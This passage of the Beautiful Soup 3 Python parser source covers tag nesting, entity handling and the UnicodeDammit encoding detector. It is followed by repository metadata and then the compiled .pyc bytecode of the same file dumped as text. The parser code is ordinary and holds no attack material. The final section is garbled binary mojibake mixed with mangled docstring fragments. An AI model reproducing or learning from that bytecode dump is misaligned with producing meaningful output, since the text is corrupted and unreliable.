Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' """ nestingResetTriggers = self.NESTABLE_TAGS.get(name) isNestable = nestingResetTriggers != None isResetNesting = self.RESET_NESTING_TAGS.has_key(name) popTo = None inclusive = True for i in range(len(self.tagStack)-1, 0, -1): p = self.tagStack[i] if (not p or p.name == name) and not isNestable: #Non-nestable tags get popped to the top or to their #last occurance. popTo = name break if (nestingResetTriggers is not None and p.name in nestingResetTriggers) \ or (nestingResetTriggers is None and isResetNesting and self.RESET_NESTING_TAGS.has_key(p.name)): #If we encounter one of the nesting reset triggers #peculiar to this tag, or we encounter another tag #that causes nesting to reset, pop up to but not #including that tag. popTo = p.name inclusive = False break p = p.parent if popTo: self._popToTag(popTo, inclusive) def unknown_starttag(self, name, attrs, selfClosing=0): #print "Start tag %s: %s" % (name, attrs) if self.quoteStack: #This is not a real tag. #print "<%s> is not real!" % name attrs = ''.join([' %s="%s"' % (x, y) for x, y in attrs]) self.handle_data('<%s%s>' % (name, attrs)) return self.endData() if not self.isSelfClosingTag(name) and not selfClosing: self._smartPop(name) if self.parseOnlyThese and len(self.tagStack) <= 1 \ and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): return tag = Tag(self, name, attrs, self.currentTag, self.previous) if self.previous: self.previous.next = tag self.previous = tag self.pushTag(tag) if selfClosing or self.isSelfClosingTag(name): self.popTag() if name in self.QUOTE_TAGS: #print "Beginning quote (%s)" % name self.quoteStack.append(name) self.literal = 1 return tag def unknown_endtag(self, name): #print "End tag %s" % name if self.quoteStack and self.quoteStack[-1] != name: #This is not a real end tag. #print "</%s> is not real!" % name self.handle_data('</%s>' % name) return self.endData() self._popToTag(name) if self.quoteStack and self.quoteStack[-1] == name: self.quoteStack.pop() self.literal = (len(self.quoteStack) > 0) def handle_data(self, data): self.currentData.append(data) def _toStringSubclass(self, text, subclass): """Adds a certain piece of text to the tree as a NavigableString subclass.""" self.endData() self.handle_data(text) self.endData(subclass) def handle_pi(self, text): """Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.""" if text[:3] == "xml": text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" self._toStringSubclass(text, ProcessingInstruction) def handle_comment(self, text): "Handle comments as Comment objects." self._toStringSubclass(text, Comment) def handle_charref(self, ref): "Handle character references as data." if self.convertEntities: data = unichr(int(ref)) else: data = '&#%s;' % ref self.handle_data(data) def handle_entityref(self, ref): """Handle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.""" data = None if self.convertHTMLEntities: try: data = unichr(name2codepoint[ref]) except KeyError: pass if not data and self.convertXMLEntities: data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) if not data and self.convertHTMLEntities and \ not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): # TODO: We've got a problem here. We're told this is # an entity reference, but it's not an XML entity # reference or an HTML entity reference. Nonetheless, # the logical thing to do is to pass it through as an # unrecognized entity reference. # # Except: when the input is "&carol;" this function # will be called with input "carol". When the input is # "AT&T", this function will be called with input # "T". We have no way of knowing whether a semicolon # was present originally, so we don't know whether # this is an unknown entity or just a misplaced # ampersand. # # The more common case is a misplaced ampersand, so I # escape the ampersand and omit the trailing semicolon. data = "&amp;%s" % ref if not data: # This case is different from the one above, because we # haven't already gone through a supposedly comprehensive # mapping of entities to Unicode characters. We might not # have gone through any mapping at all. So the chances are # very high that this is a real entity, and not a # misplaced ampersand. data = "&%s;" % ref self.handle_data(data) def handle_decl(self, data): "Handle DOCTYPEs and the like as Declaration objects." self._toStringSubclass(data, Declaration) def parse_declaration(self, i): """Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.""" j = None if self.rawdata[i:i+9] == '<![CDATA[': k = self.rawdata.find(']]>', i) if k == -1: k = len(self.rawdata) data = self.rawdata[i+9:k] j = k+3 self._toStringSubclass(data, CData) else: try: j = SGMLParser.parse_declaration(self, i) except SGMLParseError: toHandle = self.rawdata[i:] self.handle_data(toHandle) j = i + len(toHandle) return j class BeautifulSoup(BeautifulStoneSoup): """This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.""" def __init__(self, *args, **kwargs): if not kwargs.has_key('smartQuotesTo'): kwargs['smartQuotesTo'] = self.HTML_ENTITIES kwargs['isHTML'] = True BeautifulStoneSoup.__init__(self, *args, **kwargs) SELF_CLOSING_TAGS = buildTagMap(None, ('br' , 'hr', 'input', 'img', 'meta', 'spacer', 'link', 'frame', 'base', 'col')) PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea']) QUOTE_TAGS = {'script' : None, 'textarea' : None} #According to the HTML standard, each of these inline tags can #contain another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_INLINE_TAGS = ('span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', 'center') #According to the HTML standard, these block tags can contain #another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_BLOCK_TAGS = ('blockquote', 'div', 'fieldset', 'ins', 'del') #Lists can contain other lists, but there are restrictions. NESTABLE_LIST_TAGS = { 'ol' : [], 'ul' : [], 'li' : ['ul', 'ol'], 'dl' : [], 'dd' : ['dl'], 'dt' : ['dl'] } #Tables can contain other tables, but there are restrictions. NESTABLE_TABLE_TAGS = {'table' : [], 'tr' : ['table', 'tbody', 'tfoot', 'thead'], 'td' : ['tr'], 'th' : ['tr'], 'thead' : ['table'], 'tbody' : ['table'], 'tfoot' : ['table'], } NON_NESTABLE_BLOCK_TAGS = ('address', 'form', 'p', 'pre') #If one of these tags is encountered, all tags up to the next tag of #this type are popped. RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', NON_NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) # Used to detect the charset in a META tag; see start_meta CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M) def start_meta(self, attrs): """Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.""" httpEquiv = None contentType = None contentTypeIndex = None tagNeedsEncodingSubstitution = False for i in range(0, len(attrs)): key, value = attrs[i] key = key.lower() if key == 'http-equiv': httpEquiv = value elif key == 'content': contentType = value contentTypeIndex = i if httpEquiv and contentType: # It's an interesting meta tag. match = self.CHARSET_RE.search(contentType) if match: if (self.declaredHTMLEncoding is not None or self.originalEncoding == self.fromEncoding): # An HTML encoding was sniffed while converting # the document to Unicode, or an HTML encoding was # sniffed during a previous pass through the # document, or an encoding was specified # explicitly and it worked. Rewrite the meta tag. def rewrite(match): return match.group(1) + "%SOUP-ENCODING%" newAttr = self.CHARSET_RE.sub(rewrite, contentType) attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], newAttr) tagNeedsEncodingSubstitution = True else: # This is our first pass through the document. # Go through it again with the encoding information. newCharset = match.group(3) if newCharset and newCharset != self.originalEncoding: self.declaredHTMLEncoding = newCharset self._feed(self.declaredHTMLEncoding) raise StopParsing pass tag = self.unknown_starttag("meta", attrs) if tag and tagNeedsEncodingSubstitution: tag.containsSubstitutions = True class StopParsing(Exception): pass class ICantBelieveItsBeautifulSoup(BeautifulSoup): """The BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.""" I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ ('em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', 'big') I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ('noscript') NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) class MinimalSoup(BeautifulSoup): """The MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.""" RESET_NESTING_TAGS = buildTagMap('noscript') NESTABLE_TAGS = {} class BeautifulSOAP(BeautifulStoneSoup): """This class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.""" def popTag(self): if len(self.tagStack) > 1: tag = self.tagStack[-1] parent = self.tagStack[-2] parent._getAttrMap() if (isinstance(tag, Tag) and len(tag.contents) == 1 and isinstance(tag.contents[0], NavigableString) and not parent.attrMap.has_key(tag.name)): parent[tag.name] = tag.contents[0] BeautifulStoneSoup.popTag(self) #Enterprise class names! It has come to our attention that some people #think the names of the Beautiful Soup parser classes are too silly #and "unprofessional" for use in enterprise screen-scraping. We feel #your pain! For such-minded folk, the Beautiful Soup Consortium And #All-Night Kosher Bakery recommends renaming this file to #"RobustParser.py" (or, in cases of extreme enterprisiness, #"RobustParserBeanInterface.class") and using the following #enterprise-friendly class aliases: class RobustXMLParser(BeautifulStoneSoup): pass class RobustHTMLParser(BeautifulSoup): pass class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup): pass class RobustInsanelyWackAssHTMLParser(MinimalSoup): pass class SimplifyingSOAPParser(BeautifulSOAP): pass ###################################################### # # Bonus library: Unicode, Dammit # # This class forces XML data into a standard format (usually to UTF-8 # or Unicode). It is heavily based on code from Mark Pilgrim's # Universal Feed Parser. It does not rewrite the XML or HTML to # reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi # (XML) and BeautifulSoup.start_meta (HTML). # Autodetects character encodings. # Download from http://chardet.feedparser.org/ try: import chardet # import chardet.constants # chardet.constants._debug = 1 except ImportError: chardet = None # cjkcodecs and iconv_codec make Python know about more character encodings. # Both are available from http://cjkpython.i18n.org/ # They're built in if you use Python 2.4. try: import cjkcodecs.aliases except ImportError: pass try: import iconv_codec except ImportError: pass class UnicodeDammit: """A class for detecting the encoding of a *ML document and converting it to a Unicode string. If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.""" # This dictionary maps commonly seen values for "charset" in HTML # meta tags to the corresponding Python codec names. It only covers # values that aren't in Python's aliases and can't be determined # by the heuristics in find_codec. CHARSET_ALIASES = { "macintosh" : "mac-roman", "x-sjis" : "shift-jis" } def __init__(self, markup, overrideEncodings=[], smartQuotesTo='xml', isHTML=False): self.declaredHTMLEncoding = None self.markup, documentEncoding, sniffedEncoding = \ self._detectEncoding(markup, isHTML) self.smartQuotesTo = smartQuotesTo self.triedEncodings = [] if markup == '' or isinstance(markup, unicode): self.originalEncoding = None self.unicode = unicode(markup) return u = None for proposedEncoding in overrideEncodings: u = self._convertFrom(proposedEncoding) if u: break if not u: for proposedEncoding in (documentEncoding, sniffedEncoding): u = self._convertFrom(proposedEncoding) if u: break # If no luck and we have auto-detection library, try that: if not u and chardet and not isinstance(self.markup, unicode): u = self._convertFrom(chardet.detect(self.markup)['encoding']) # As a last resort, try utf-8 and windows-1252: if not u: for proposed_encoding in ("utf-8", "windows-1252"): u = self._convertFrom(proposed_encoding) if u: break self.unicode = u if not u: self.originalEncoding = None def _subMSChar(self, orig): """Changes a MS smart quote character to an XML or HTML entity.""" sub = self.MS_CHARS.get(orig) if isinstance(sub, tuple): if self.smartQuotesTo == 'xml': sub = '&#x%s;' % sub[1] else: sub = '&%s;' % sub[0] return sub def _convertFrom(self, proposed): proposed = self.find_codec(proposed) if not proposed or proposed in self.triedEncodings: return None self.triedEncodings.append(proposed) markup = self.markup # Convert smart quotes to HTML if coming from an encoding # that might have them. if self.smartQuotesTo and proposed.lower() in("windows-1252", "iso-8859-1", "iso-8859-2"): markup = re.compile("([\x80-\x9f])").sub \ (lambda(x): self._subMSChar(x.group(1)), markup) try: # print "Trying to convert document to %s" % proposed u = self._toUnicode(markup, proposed) self.markup = u self.originalEncoding = proposed except Exception, e: # print "That didn't work!" # print e return None #print "Correct encoding: %s" % proposed return self.markup def _toUnicode(self, data, encoding): '''Given a string and its encoding, decodes the string into Unicode. %encoding is a string recognized by encodings.aliases''' # strip Byte Order Mark (if present) if (len(data) >= 4) and (data[:2] == '\xfe\xff') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16be' data = data[2:] elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16le' data = data[2:] elif data[:3] == '\xef\xbb\xbf': encoding = 'utf-8' data = data[3:] elif data[:4] == '\x00\x00\xfe\xff': encoding = 'utf-32be' data = data[4:] elif data[:4] == '\xff\xfe\x00\x00': encoding = 'utf-32le' data = data[4:] newdata = unicode(data, encoding) return newdata def _detectEncoding(self, xml_data, isHTML=False): """Given a document, tries to detect its XML encoding.""" xml_encoding = sniffed_xml_encoding = None try: if xml_data[:4] == '\x4c\x6f\xa7\x94': # EBCDIC xml_data = self._ebcdic_to_ascii(xml_data) elif xml_data[:4] == '\x00\x3c\x00\x3f': # UTF-16BE sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data, 'utf-16be').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \ and (xml_data[2:4] != '\x00\x00'): # UTF-16BE with BOM sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x3f\x00': # UTF-16LE sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data, 'utf-16le').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \ (xml_data[2:4] != '\x00\x00'): # UTF-16LE with BOM sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8') elif xml_data[:4] == '\x00\x00\x00\x3c': # UTF-32BE sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data, 'utf-32be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x00\x00': # UTF-32LE sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data, 'utf-32le').encode('utf-8') elif xml_data[:4] == '\x00\x00\xfe\xff': # UTF-32BE with BOM sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8') elif xml_data[:4] == '\xff\xfe\x00\x00': # UTF-32LE with BOM sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8') elif xml_data[:3] == '\xef\xbb\xbf': # UTF-8 with BOM sniffed_xml_encoding = 'utf-8' xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8') else: sniffed_xml_encoding = 'ascii' pass except: xml_encoding_match = None xml_encoding_match = re.compile( '^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data) if not xml_encoding_match and isHTML: regexp = re.compile('<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I) xml_encoding_match = regexp.search(xml_data) if xml_encoding_match is not None: xml_encoding = xml_encoding_match.groups()[0].lower() if isHTML: self.declaredHTMLEncoding = xml_encoding if sniffed_xml_encoding and \ (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode', 'iso-10646-ucs-4', 'ucs-4', 'csucs4', 'utf-16', 'utf-32', 'utf_16', 'utf_32', 'utf16', 'u16')): xml_encoding = sniffed_xml_encoding return xml_data, xml_encoding, sniffed_xml_encoding def find_codec(self, charset): return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \ or (charset and self._codec(charset.replace("-", ""))) \ or (charset and self._codec(charset.replace("-", "_"))) \ or charset def _codec(self, charset): if not charset: return charset codec = None try: codecs.lookup(charset) codec = charset except (LookupError, ValueError): pass return codec EBCDIC_TO_ASCII_MAP = None def _ebcdic_to_ascii(self, s): c = self.__class__ if not c.EBCDIC_TO_ASCII_MAP: emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15, 16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31, 128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7, 144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26, 32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33, 38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94, 45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63, 186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34, 195,97,98,99,100,101,102,103,104,105,196,197,198,199,200, 201,202,106,107,108,109,110,111,112,113,114,203,204,205, 206,207,208,209,126,115,116,117,118,119,120,121,122,210, 211,212,213,214,215,216,217,218,219,220,221,222,223,224, 225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72, 73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81, 82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89, 90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57, 250,251,252,253,254,255) import string c.EBCDIC_TO_ASCII_MAP = string.maketrans( \ ''.join(map(chr, range(256))), ''.join(map(chr, emap))) return s.translate(c.EBCDIC_TO_ASCII_MAP) MS_CHARS = { '\x80' : ('euro', '20AC'), '\x81' : ' ', '\x82' : ('sbquo', '201A'), '\x83' : ('fnof', '192'), '\x84' : ('bdquo', '201E'), '\x85' : ('hellip', '2026'), '\x86' : ('dagger', '2020'), '\x87' : ('Dagger', '2021'), '\x88' : ('circ', '2C6'), '\x89' : ('permil', '2030'), '\x8A' : ('Scaron', '160'), '\x8B' : ('lsaquo', '2039'), '\x8C' : ('OElig', '152'), '\x8D' : '?', '\x8E' : ('#x17D', '17D'), '\x8F' : '?', '\x90' : '?', '\x91' : ('lsquo', '2018'), '\x92' : ('rsquo', '2019'), '\x93' : ('ldquo', '201C'), '\x94' : ('rdquo', '201D'), '\x95' : ('bull', '2022'), '\x96' : ('ndash', '2013'), '\x97' : ('mdash', '2014'), '\x98' : ('tilde', '2DC'), '\x99' : ('trade', '2122'), '\x9a' : ('scaron', '161'), '\x9b' : ('rsaquo', '203A'), '\x9c' : ('oelig', '153'), '\x9d' : '?', '\x9e' : ('#x17E', '17E'), '\x9f' : ('Yuml', ''),} ####################################################################### #By default, act as an HTML pretty-printer. if __name__ == '__main__': import sys soup = BeautifulSoup(sys.stdin) print soup.prettify()
79,254
Python
.py
1,738
34.281358
186
0.585839
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,914
BeautifulSoup.pyc
pwnieexpress_raspberry_pwn/src/pentest/plecost/BeautifulSoup.pyc
—Ú ›ªMc@sûdZddklZdZdZdZdZddklZl Z ddk Z ddk Z ddk Z ddk Z ddkZydd klZWnej o hZnXyeWn#ej odd klZnXe id Ée_e id Éie _d ZdÑZdefdÑÉYZdeefdÑÉYZdefdÑÉYZdefdÑÉYZ defdÑÉYZ!defdÑÉYZ"defdÑÉYZ#dfdÑÉYZ$de%fd ÑÉYZ&d!ÑZ'd"e#efd#ÑÉYZ(d$e(fd%ÑÉYZ)d&e*fd'ÑÉYZ+d(e)fd)ÑÉYZ,d*e)fd+ÑÉYZ-d,e(fd-ÑÉYZ.d.e(fd/ÑÉYZ/d0e)fd1ÑÉYZ0d2e,fd3ÑÉYZ1d4e-fd5ÑÉYZ2d6e.fd7ÑÉYZ3yddk4Z4Wnej o e5Z4nXyddk6Z7Wnej onXyddk8Z8Wnej onXd8fd9ÑÉYZ9e:d:jo*ddk;Z;e)e;i<ÉZ=e=i>ÉGHndS(;sÊ Beautiful Soup Elixir and Tonic "The Screen-Scraper's Friend" http://www.crummy.com/software/BeautifulSoup/ Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation. It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree. A well-formed XML/HTML document yields a well-formed data structure. An ill-formed XML/HTML document yields a correspondingly ill-formed data structure. If your document is only locally well-formed, you can use this library to find and process the well-formed part of it. Beautiful Soup works with Python 2.2 and up. It has no external dependencies, but you'll have more success at converting data to UTF-8 if you also install these three packages: * chardet, for auto-detecting character encodings http://chardet.feedparser.org/ * cjkcodecs and iconv_codec, which add more encodings to the ones supported by stock Python. http://cjkpython.i18n.org/ Beautiful Soup defines classes for two main parsing strategies: * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific language that kind of looks like XML. * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid or invalid. This class has web browser-like heuristics for obtaining a sensible parse tree in the face of common HTML errors. Beautiful Soup also defines a class (UnicodeDammit) for autodetecting the encoding of an HTML or XML document, and converting it to Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. For more than you ever wanted to know about Beautiful Soup, see the documentation: http://www.crummy.com/software/BeautifulSoup/documentation.html Here, have some legalese: Copyright (c) 2004-2009, Leonard Richardson All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. iˇˇˇˇ(t generatorss*Leonard Richardson (leonardr@segfault.org)s3.0.8s*Copyright (c) 2004-2009 Leonard Richardsons New-style BSD(t SGMLParsertSGMLParseErrorN(tname2codepoint(tSets[a-zA-Z][-_.:a-zA-Z0-9]*s-zA-Z][-_.:a-zA-Z0-9]*\s*sutf-8cCstid|ÉS(s(Build a RE to match the given CSS class.s(^|.*\s)%s($|\s)(tretcompile(tstr((s!/pentest/plecost/BeautifulSoup.pyt_match_css_classkst PageElementcBseZdZdddÑZdÑZdÑZdÑZdÑZdÑZ dÑZ dhddÑZ dhddd ÑZ dhdd ÑZ dhddd ÑZeZdhdd ÑZdhddd ÑZeZdhddÑZdhdddÑZeZdhdÑZdhddÑZeZdÑZdÑZdÑZdÑZdÑZdÑZdÑZddÑZ ddÑZ!RS(seContains the navigational information for some part of the page (either a tag or a piece of text)cCsk||_||_d|_d|_d|_|io0|iio#|iid|_||i_ndS(sNSets up the initial relations between this element and other elements.iˇˇˇˇN(tparenttprevioustNonetnexttpreviousSiblingt nextSiblingtcontents(tselfR R ((s!/pentest/plecost/BeautifulSoup.pytsetupus     cCsî|i}|ii|É}t|dÉoK|i|ijo8|ii|É}|o||jo|d}qvn|iÉ|i||ÉdS(NR i(R tindexthasattrtextracttinsert(Rt replaceWitht oldParenttmyIndexR((s!/pentest/plecost/BeautifulSoup.pyRÅs  cCsc|i}|ii|É}|iÉt|iÉ}|iÉx|D]}|i||ÉqEWdS(N(R RRtlistRtreverseR(RtmyParentRtreversedChildrentchild((s!/pentest/plecost/BeautifulSoup.pytreplaceWithChildrenês   cCs|io7y|ii|ii|É=WqAtj oqAXn|iÉ}|i}|io||i_n|o|i|_nd|_d|_d|_|io|i |i_ n|i o|i|i _nd|_|_ |S(s0Destructively rips this element out of the tree.N( R RRt ValueErrort_lastRecursiveChildR R R RR(Rt lastChildt nextElement((s!/pentest/plecost/BeautifulSoup.pyRôs(          cCs9|}x,t|dÉo|io|id}q W|S(s8Finds the last element beneath this object to be parsed.Riˇˇˇˇ(RR(RR"((s!/pentest/plecost/BeautifulSoup.pyR!∂s c Cs%t|tÉo!t|tÉ ot|É}nt|t|iÉÉ}t|dÉo\|idj oL|i|jo.|i |É}||jo|d}qßn|i Én||_d}|djod|_ ||_ n6|i|d}||_ ||i _ |iÉ|_ |i o||i _n|iÉ}|t|iÉjocd|_ |}d}x*|p"|i }|i}|pPqpqpW|o ||_qÙd|_n:|i|}||_ |i o||i _ n||_|io||i_ n|ii||ÉdS(NR ii(t isinstancet basestringtNavigableStringtmintlenRRR R RRRR RR!R R( RtpositiontnewChildRt previousChildtnewChildsLastElementR tparentsNextSiblingt nextChild((s!/pentest/plecost/BeautifulSoup.pyRΩsV                     cCs|it|iÉ|ÉdS(s2Appends the given tag to the contents of this tag.N(RR(R(Rttag((s!/pentest/plecost/BeautifulSoup.pytappend¯scKs|i|i||||çS(sjReturns the first item that matches the given criteria and appears after this Tag in the document.(t_findOnet findAllNext(Rtnametattrsttexttkwargs((s!/pentest/plecost/BeautifulSoup.pytfindNext¸scKs|i|||||i|çS(sbReturns all items that match the given criteria and appear after this Tag in the document.(t_findAllt nextGenerator(RR3R4R5tlimitR6((s!/pentest/plecost/BeautifulSoup.pyR2scKs|i|i||||çS(s{Returns the closest sibling to this Tag that matches the given criteria and appears after this Tag in the document.(R1tfindNextSiblings(RR3R4R5R6((s!/pentest/plecost/BeautifulSoup.pytfindNextSiblingscKs|i|||||i|çS(sqReturns the siblings of this Tag that match the given criteria and appear after this Tag in the document.(R8tnextSiblingGenerator(RR3R4R5R:R6((s!/pentest/plecost/BeautifulSoup.pyR;scKs|i|i||||çS(skReturns the first item that matches the given criteria and appears before this Tag in the document.(R1tfindAllPrevious(RR3R4R5R6((s!/pentest/plecost/BeautifulSoup.pyt findPreviousscKs|i|||||i|çS(scReturns all items that match the given criteria and appear before this Tag in the document.(R8tpreviousGenerator(RR3R4R5R:R6((s!/pentest/plecost/BeautifulSoup.pyR>scKs|i|i||||çS(s|Returns the closest sibling to this Tag that matches the given criteria and appears before this Tag in the document.(R1tfindPreviousSiblings(RR3R4R5R6((s!/pentest/plecost/BeautifulSoup.pytfindPreviousSibling#scKs|i|||||i|çS(srReturns the siblings of this Tag that match the given criteria and appear before this Tag in the document.(R8tpreviousSiblingGenerator(RR3R4R5R:R6((s!/pentest/plecost/BeautifulSoup.pyRA)scKs4d}|i||dÉ}|o|d}n|S(sOReturns the closest parent of this Tag that matches the given criteria.iiN(R t findParents(RR3R4R6trtl((s!/pentest/plecost/BeautifulSoup.pyt findParent1s cKs|i||d||i|çS(sFReturns the parents of this Tag that match the given criteria.N(R8R tparentGenerator(RR3R4R:R6((s!/pentest/plecost/BeautifulSoup.pyRD<scKs7d}||||d|ç}|o|d}n|S(Nii(R (RtmethodR3R4R5R6RERF((s!/pentest/plecost/BeautifulSoup.pyR1Fs cKsöt|tÉo |}n·| oT|tjoG| o?| 